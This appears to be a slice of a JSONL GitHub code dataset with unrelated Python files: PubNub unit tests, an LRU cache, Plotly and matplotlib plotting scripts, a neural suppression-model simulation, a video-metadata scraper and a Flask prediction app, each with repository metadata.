{"api_name": "discord.ui.button", "line_number": 26, "usage_type": "call"}, {"api_name": "discord.ui", "line_number": 26, "usage_type": "attribute"}, 
{"api_name": "discord.ButtonStyle", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ext.tasks.loop", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.ext.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "config.queue_timer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "config.queue_timer", "line_number": 62, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "config.queue_timer", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sched.scheduler", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "34180895202", "text": "import unittest\nimport threading\n\nfrom pubnub.pubnub import PubNub\nfrom tests.helper import pnconf\n\n\nclass TestPubNubSuccessHistoryDelete(unittest.TestCase): # pylint: disable=W0612\n def setUp(self):\n self.event = threading.Event()\n\n def callback(self, response, status):\n self.response = response\n self.status = status\n self.event.set()\n\n def assert_success(self):\n self.event.wait()\n if self.status.is_error():\n self.fail(str(self.status.error_data.exception))\n self.event.clear()\n self.response = None\n self.status = None\n\n def test_success(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n\n def test_super_call(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch- |.* $\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n", "repo_name": "pubnub/python", "sub_path": "tests/integrational/native_threads/test_history_delete.py", "file_name": "test_history_delete.py", "file_ext": "py", "file_size_in_byte": 1063, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 155, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 10, "usage_type": "call"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 26, "usage_type": "argument"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 35, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 35, "usage_type": "argument"}]}
+{"seq_id": "21963434324", "text": "from collections import OrderedDict\nfrom copy import deepcopy\nfrom typing import Any\n\nfrom pims.config import get_settings\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.cache = OrderedDict()\n self.capacity = capacity\n\n def get(self, key: str) -> Any:\n if key not in self.cache:\n return None\n else:\n self.cache.move_to_end(key)\n return self.cache[key]\n\n def put(self, key: str, value: Any) -> None:\n self.cache[key] = value\n self.cache.move_to_end(key)\n if len(self.cache) > self.capacity:\n self.cache.popitem(last=False)\n\n\nclass ImageLRUCache(LRUCache):\n def get(self, key: str) -> Any:\n image = super().get(key)\n if image is None:\n return None\n cloned = deepcopy(image)\n self.cache[key] = cloned\n return cloned\n\n\nIMAGE_CACHE = ImageLRUCache(get_settings().memory_lru_cache_capacity)\n", "repo_name": "Cytomine-ULiege/pims", "sub_path": "pims/cache/memory.py", "file_name": "memory.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.OrderedDict", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "pims.config.get_settings", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "27574655967", "text": "import plotly.express as px\nimport time\n\ndef Parallel_Coordinates_Plot():\n start_time = time.time()\n\n df = px.data.iris()\n fig = px.parallel_coordinates(df, color=\"species_id\", labels={\"species_id\": \"Species\",\n \"sepal_width\": \"Sepal Width\", \"sepal_length\": \"Sepal Length\",\n \"petal_width\": \"Petal Width\", \"petal_length\": \"Petal Length\", },\n color_continuous_scale=px.colors.diverging.Tealrose,\n color_continuous_midpoint=2)\n fig.update_layout(\n title='Parallel Coodinates Plot')\n\n end_time = round(time.time() - start_time, 3)\n print(str(end_time) + ' seconds Graphing data for Parallel_Coordinates_Plot')\n\n fig.show()", "repo_name": "AllenChildress/Python_Plotly_Demo", "sub_path": "Parallel_Coordinates_Plot.py", "file_name": "Parallel_Coordinates_Plot.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 5, "usage_type": "call"}, {"api_name": "plotly.express.data.iris", "line_number": 7, "usage_type": "call"}, {"api_name": "plotly.express.data", "line_number": 7, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 7, "usage_type": "name"}, {"api_name": "plotly.express.parallel_coordinates", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 8, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 11, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "38273194895", "text": "\"\"\"\nSimulate model with many parameters.\n\"\"\"\n\nimport os\nimport numpy as np\nfrom jaratoolbox import settings\nimport studyparams\nimport figparams\nimport model_suppression as suppmodel\nreload(suppmodel)\n\nfigName = 'figure_model'\ndataDir = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, figName)\n\n# -- Simulate model --\nnCells = 101\n\nRANDOMIZED = 1\nnp.random.seed(1)\n\ndef random_in_range(low,high,shape):\n \"\"\"Return equally distributed random numbers in specified range\"\"\"\n width = high-low\n randVec = width*np.random.rand(shape) + low\n return randVec\n\nif RANDOMIZED:\n nSamples = 200\n #rfWidths = {'PV':5, 'SOM':5, 'Thal':5}\n rfWidths = None\n# ampPVvec = random_in_range(-1, -30, nSamples)\n# ampSOMvec = random_in_range(-1, -30, nSamples)\n# stdThalvec = random_in_range(2, 5, nSamples)\n suppIndexVec = np.empty((3,nSamples)) # 3:Control, PV, SOM\n changeAtPeakVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n changeAtWNVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n \n oct_range = 6\n\n stdPVoct = 0.8 * (nCells-1)/oct_range\n ampPVvec = random_in_range(-1, -30, nSamples) \n ampSOMvec = random_in_range(-1, -30, nSamples) \n stdSOMvec = random_in_range(1, 2, nSamples)\n stdThalvec = random_in_range(.2, 1, nSamples)\n\n\n for inds in range(nSamples):\n wParams = {'ampPV':ampPVvec[inds], 'stdPV':stdPVoct, #'stdPV':10,\n 'ampSOM':ampSOMvec[inds], 'stdSOM':stdSOMvec[inds] * stdPVoct, #'stdSOM':20, \n 'ampThal':100, 'stdThal':stdThalvec[inds] * stdPVoct} #stdThalvec[inds] \n net = suppmodel.Network(nCells, wParams, rfWidths)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexVec[:,inds] = suppIndex\n changeAtPeakVec[:,inds] = changeAtPeak\n changeAtWNVec[:,inds] = changeAtWN\nelse:\n ampPVvec = np.arange(-2,-44, -4) # -20\n ampSOMvec = np.arange(-2,-44, -4) # -20\n stdThalvec = [5,7,9]#np.arange(3, 15, 2) # 6\n\n suppIndexAll = np.empty((3,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 3:Control, PV, SOM\n changeAtPeakAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n changeAtWNAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n\n for indPV,ampPV in enumerate(ampPVvec):\n for indSOM,ampSOM in enumerate(ampSOMvec):\n for indThal,stdThal in enumerate(stdThalvec):\n wParams = {'ampPV':ampPV, 'stdPV':10,\n 'ampSOM':ampSOM, 'stdSOM':30,\n 'ampThal':100, 'stdThal':stdThal}\n net = suppmodel.Network(nCells, wParams)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexAll[:,indPV,indSOM,indThal] = suppIndex\n changeAtPeakAll[:,indPV,indSOM,indThal] = changeAtPeak\n changeAtWNAll[:,indPV,indSOM,indThal] = changeAtWN\n nConds = len(ampPVvec)*len(ampSOMvec)*len(stdThalvec) \n suppIndexVec = suppIndexAll.reshape([3,nConds])\n changeAtPeakVec = changeAtPeakAll.reshape([2,nConds])\n changeAtWNVec = changeAtWNAll.reshape([2,nConds])\n\n \nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nmarkerSize = 3\n\n# -- Plot supp index --\nplt.subplot(2,2,1)\nplt.plot(suppIndexVec[0],suppIndexVec[1],'sb', mfc='none', ms=markerSize)\nplt.plot(suppIndexVec[0],suppIndexVec[2],'or', mfc='none', 
ms=markerSize)\nxLims = [-0.1,1.1]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Suppression Index (control)')\nplt.ylabel('Suppression Index (inactivation)')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\navgSIchangePV = np.median(suppIndexVec[1]-suppIndexVec[0])\navgSIchangeSOM = np.median(suppIndexVec[2]-suppIndexVec[0])\nplt.bar(1,avgSIchangePV, fc='w', ec='b', lw=2)\nplt.bar(2,avgSIchangeSOM, fc='w', ec='r', lw=2)\n\n\n# -- Plot change in response --\nplt.subplot(2,2,3)\nplt.plot(changeAtPeakVec[0,:],changeAtWNVec[0,:],'sb', mfc='none', ms=markerSize)\nplt.plot(changeAtPeakVec[1,:],changeAtWNVec[1,:],'or', mfc='none', ms=markerSize)\nxLims = [-50,1500]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Change in response to preferred bandwidth')\nplt.ylabel('Change in response to WN')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\n\n\n# -- Save data --\noutputFile = 'response_change_summary.npz'\noutputFullPath = os.path.join(dataDir,outputFile)\n\nnp.savez(outputFullPath, suppIndexVec=suppIndexVec,\n changeAtPeakVec=changeAtPeakVec, changeAtWNVec=changeAtWNVec,\n condLabels=condLabels)\nprint(\"Saved {}\".format(outputFullPath))\n", "repo_name": "sjara/jaratest", "sub_path": "common/2018acsup/generate_model.py", "file_name": "generate_model.py", "file_ext": "py", "file_size_in_byte": 5103, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings.FIGURES_DATA_PATH", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "figparams.STUDY_NAME", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 37, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 52, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 54, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 66, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 74, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 76, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 94, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.savez", "line_number": 131, "usage_type": "call"}]}
+{"seq_id": "3425393519", "text": "import requests\nimport bs4\n\n\ndef encode(url):\n return \"\".join([chr((ord(rune) + 1) % 128) for rune in url])\n\n\nclass Bus:\n ''' Data source -- BUS\n '''\n base_url = encode(\"gssor9..vvv-i`uatr-bnl.\")\n search_prefix = encode(\"rd`qbg.\")\n http_proxy = \"\"\n\n def __init__(self, http_proxy=\"\"):\n self.http_proxy = http_proxy\n\n def Get(self, designatio):\n result = {}\n\n # URL for searching designatio\n URL = self.base_url + self.search_prefix + designatio\n\n # Using requests\n headers = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'cache-control': 'max-age=0',\n 'cookie': 'existmag=all',\n 'referer': 'https://www.javbus.com',\n 'sec-ch-ua': '\"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"macOS\"',\n 'sec-fetch-dest': 'document',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-user': '?1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',\n }\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n\n # parse html\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n search_result = soup.select(\".item\")\n if search_result is None or len(search_result) == 0:\n # No result\n raise Exception(\"Not recruited\")\n\n # multiple result - choose the correct one\n matched = []\n for r in search_result:\n id = r.find(\"date\").string\n if id == designatio:\n title = r.find(\"img\").attrs[\"title\"]\n matched.append((id + \" \" + title, r.find(\"a\").attrs[\"href\"]))\n\n idx = 0\n if len(matched) > 1:\n print(\"Multiple Choice:\")\n for i in range(0, len(matched)):\n print(\" [%d] %s\" % (i, matched[i][0]))\n idx = int(input(\"\\nSelect > \"))\n URL = matched[idx][1]\n\n # get info\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n # search title\n result[\"title\"] = soup.select_one(\"body > .container > h3\").string\n\n # cover image\n cover_url = soup.select_one(\".bigImage\")[\"href\"]\n if cover_url.startswith('/'):\n cover_url = self.base_url + cover_url\n result[\"cover_url\"] = cover_url\n\n # outline \n try:\n airav_URL = encode(\"gssor9..vvv-`hq`u-vhjh.uhcdn.\") + designatio\n outline_rep = requests.get(\n airav_URL, proxies={\"http\": self.http_proxy}, headers=headers)\n airav_soup = bs4.BeautifulSoup(\n outline_rep.content, features=\"html.parser\")\n result[\"outline\"] = airav_soup.select_one(\".synopsis > p\").string\n except:\n pass\n\n # infomation\n attributes = [e.string for e in soup.select(\".header\")]\n include = {\n \"designatio\": '識別碼:' in attributes,\n \"date\": '發行日期:' in attributes,\n \"length\": '長度:' in attributes,\n \"director\": '導演:' in attributes,\n \"maker\": '製作商:' in attributes,\n \"label\": '發行商:' in attributes,\n \"series\": '系列:' in attributes,\n \"genres\": '類別:' in attributes,\n \"cast\": '演員' in attributes,\n }\n\n # Attributes Extract lambda function\n extract = {\n \"designatio\": lambda soup, i: i.select(\"span\")[1].string,\n \"date\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"
\"),\n \"length\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"\").strip().rstrip(\"分鐘\"),\n \"director\": lambda soup, i: i.a.string,\n \"maker\": lambda soup, i: i.a.string,\n \"label\": lambda soup, i: i.a.string,\n \"series\": lambda soup, i: i.a.string,\n \"genres\": lambda soup, i: [genre.string for genre in soup.select('a[href^=\"https://www.javbus.com/genre/\"]')][2:],\n \"cast\": lambda soup, i: [actor.a.string for actor in soup.select('span[onmouseout^=\"hoverdiv\"]')],\n }\n\n info = soup.select(\".info > p\")\n idx = 0\n\n for attr in [\"designatio\", \"date\", \"length\", \"director\", \"maker\", \"label\", \"series\", \"genres\", \"cast\"]:\n if include[attr]:\n result[attr] = extract[attr](soup, info[idx])\n idx += 1\n return result\n", "repo_name": "Lqlsoftware/avutil", "sub_path": "avutil/source/bus.py", "file_name": "bus.py", "file_ext": "py", "file_size_in_byte": 5073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "8506577518", "text": "from wsgiref import simple_server\r\nfrom flask import Flask, request, app,render_template\r\nfrom flask import Response\r\nfrom flask_cors import CORS\r\nfrom logistic_deploy import predObj\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\napp.config['DEBUG'] = True\r\n\r\n\r\nclass ClientApi:\r\n\r\n def __init__(self):\r\n self.predObj = predObj()\r\n\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/predict\", methods=['POST'])\r\ndef predictRoute():\r\n try:\r\n rateMarriage=int(request.form['rateMarriage'])\r\n age = int(request.form['age'])\r\n yearsMarried = int(request.form['yearsMarried'])\r\n children = int(request.form['children'])\r\n education = int(request.form['education'])\r\n occupation = int(request.form['occupation'])\r\n husbandOccupation = int(request.form['husbandOccupation'])\r\n religious = int(request.form['religious'])\r\n occ_2 = 0\r\n occ_3=0\r\n occ_4=0\r\n occ_5=0\r\n occ_6=0\r\n occ_husb_2=0\r\n occ_husb_3=0\r\n occ_husb_4=0\r\n occ_husb_5=0\r\n occ_husb_6=0\r\n if occupation == 2:\r\n occ_2 = 1\r\n elif occupation == 3:\r\n occ_3 = 1\r\n elif occupation == 4:\r\n occ_4 = 1\r\n elif occupation == 5:\r\n occ_5 = 1\r\n elif occ_6 == 6:\r\n occ_6 = 1\r\n else:\r\n print(occupation)\r\n \r\n if husbandOccupation == 2:\r\n occ_husb_2 = 1\r\n elif husbandOccupation == 3:\r\n occ_husb_3 = 1\r\n elif husbandOccupation == 4:\r\n occ_husb_4 = 1\r\n elif husbandOccupation == 5:\r\n occ_husb_5 = 1\r\n elif husbandOccupation == 6:\r\n occ_husb_6 = 1\r\n else:\r\n print(husbandOccupation)\r\n data = [[1,occ_2,occ_3,occ_4,occ_5,occ_6,occ_husb_2,occ_husb_3,occ_husb_4,occ_husb_5,occ_husb_6,rateMarriage,age,yearsMarried,children,religious,education]]\r\n print('data is: ', data)\r\n pred=predObj()\r\n res = pred.predict_log(data)\r\n\r\n print('result is ',res)\r\n return render_template('result.html', prediction_text='{}'.format(res))\r\n except ValueError:\r\n return Response(\"Value not found\")\r\n except Exception as e:\r\n print('exception is ',e)\r\n return Response(e)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n clntApp = ClientApi()\r\n #host = '0.0.0.0'\r\n #port = 5000\r\n app.run(debug=True)", "repo_name": "tejasjbansal/Woman-Affair-Prediction", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.app", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 8, "usage_type": "argument"}, {"api_name": "flask.app.config", "line_number": 9, "usage_type": "attribute"}, {"api_name": "flask.app", "line_number": 9, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": 
"flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.app.run", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 87, "usage_type": "name"}]}
+{"seq_id": "38276237285", "text": "from matplotlib import pyplot as plt\nfrom collections import Counter\nfrom jaratest.nick.stats import am_funcs\nreload(am_funcs)\nimport pandas\nimport numpy as np\nfrom jaratoolbox import colorpalette\nfrom jaratoolbox import extraplots\nimport matplotlib\nmatplotlib.rcParams['svg.fonttype'] = 'none'\nimport matplotlib.pyplot as plt\n# import seaborn\n\n\nthaldbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/thalamusdb_q10.pickle'\ncortdbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/cortexdb_q10.pickle'\nthaldb = pandas.read_pickle(thaldbfn)\ncortdb = pandas.read_pickle(cortdbfn)\n\nlaserTrainThresh = 1.5\nnoiseBurstThresh = 2\nisiThresh = 4\n\nthalNonID = thaldb[(thaldb['isiViolations']noiseBurstThresh) & (thaldb['lasertrainZ']noiseBurstThresh) & (cortdb['lasertrainZ']noiseBurstThresh) & (thaldb['lasertrainZ']>laserTrainThresh)]\ncortID = cortdb[(cortdb['isiViolations']noiseBurstThresh) & (cortdb['lasertrainZ']>laserTrainThresh)]\n\nthalamHSNonID = thalNonID['highestSync']\ncortamHSNonID = cortNonID['highestSync']\n\nthalamHSID = thalID['highestSync']\ncortamHSID = cortID['highestSync']\n\n\n\n# Percentage of neurons that sync to the freqs we tested\nlowFreq = 4\nhighFreq = 128\nnFreqs = 11\nfreqs = np.logspace(np.log10(lowFreq),np.log10(highFreq),nFreqs)\nfreqs = np.round(freqs, decimals=1)\nfreqs = np.r_[0, freqs]\n\nthalHighestNonID = np.round(thalamHSNonID.dropna(), decimals=1)\nthalHighestID = np.round(thalamHSID.dropna(), decimals=1)\nnThal = len(thalHighestNonID) + len(thalHighestID)\n\ncortHighestNonID = np.round(cortamHSNonID.dropna(), decimals=1)\ncortHighestID = np.round(cortamHSID.dropna(), decimals=1)\nnCort = len(cortHighestNonID) + len(cortHighestID)\n\nthalCounterNonID = Counter(thalHighestNonID)\nthalCounterID = Counter(thalHighestID)\n\ncortCounterNonID = Counter(cortHighestNonID)\ncortCounterID = Counter(cortHighestID)\n\nthalcountsNonID = [100*thalCounterNonID[freq]/np.double(nThal) for freq in freqs]\nthalcountsID = [100*thalCounterID[freq]/np.double(nThal) for freq in freqs]\n\ncortcountsNonID = [100*cortCounterNonID[freq]/np.double(nCort) for freq in freqs]\ncortcountsID = [100*cortCounterID[freq]/np.double(nCort) for freq in freqs]\n\nindex = np.arange(len(freqs))\nbar_width=0.35\nplt.clf()\nfig = plt.gcf()\nfig.set_size_inches(10.5, 3.7)\nlinewidth=2\nfontsize=20\n\nrects11 = plt.bar(index,\n thalcountsID,\n bar_width,\n label='Tagged thalamo-striatal',\n facecolor=colorpalette.TangoPalette['Orange2'],\n edgecolor=colorpalette.TangoPalette['Orange2'],\n linewidth = linewidth)\n\nrects12 = plt.bar(index,\n thalcountsNonID,\n bar_width,\n label='Thalamus, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Orange2'],\n bottom=thalcountsID,\n linewidth=linewidth)\n\nrects21 = plt.bar(index+bar_width+0.04,\n cortcountsID,\n bar_width,\n label='Tagged cortico-striatal',\n facecolor=colorpalette.TangoPalette['Plum2'],\n edgecolor=colorpalette.TangoPalette['Plum2'],\n linewidth=linewidth)\n\nrects22 = plt.bar(index+bar_width+0.04,\n cortcountsNonID,\n bar_width,\n label='Cortex, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Plum2'],\n 